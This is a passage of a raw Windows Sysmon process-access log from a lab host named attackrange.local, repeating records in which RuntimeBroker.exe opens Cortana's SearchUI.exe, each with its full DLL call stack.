4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 